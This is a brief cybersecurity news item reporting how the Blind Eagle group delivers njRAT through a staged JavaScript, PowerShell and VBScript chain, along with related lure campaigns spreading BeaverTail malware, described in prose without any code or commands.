Cyberespionage operation Blind Eagle, also known as APT-C-36, has been using a new multi-stage attack chain to facilitate njRAT remote access trojan deployment, The Hacker News reports.
Such an attack chain involves a JavaScript downloader leveraged for Discord CDN-hosted PowerShell script execution, with the script triggering the deployment of another PowerShell script and a Windows batch file while saving a VBScript file within the Windows startup folder for persistence, according to a ThreatMon report. Execution of the VBScript code then facilitates the deployment of the batch file, which is then deobfuscated for running a PowerShell script leveraged for njRAT distribution.
"njRAT, also known as Bladabindi is a remote access tool (RAT) with user interface or trojan which allows the holder of the program to control the end-user's computer," said ThreatMon.
Blind Eagle was earlier reported by CheckPoint and BlackBerry to have used spear-phishing techniques for BitRAT and AsyncRAT malware delivery.
Malicious GitHub pages and YouTube videos containing links for purported cracked office software, automated trading bots, and game cheats, have been leveraged to facilitate the download of self-extracting password-protected archives.
While threat actors continued to impersonate employers on job search platforms to lure software developers into participating in an online interview that would be followed by BeaverTail malware compromise, more recent attacks entailed the deployment of a new Qt-based BeaverTail version that enabled browser credential and cryptocurrency wallet data exfiltration.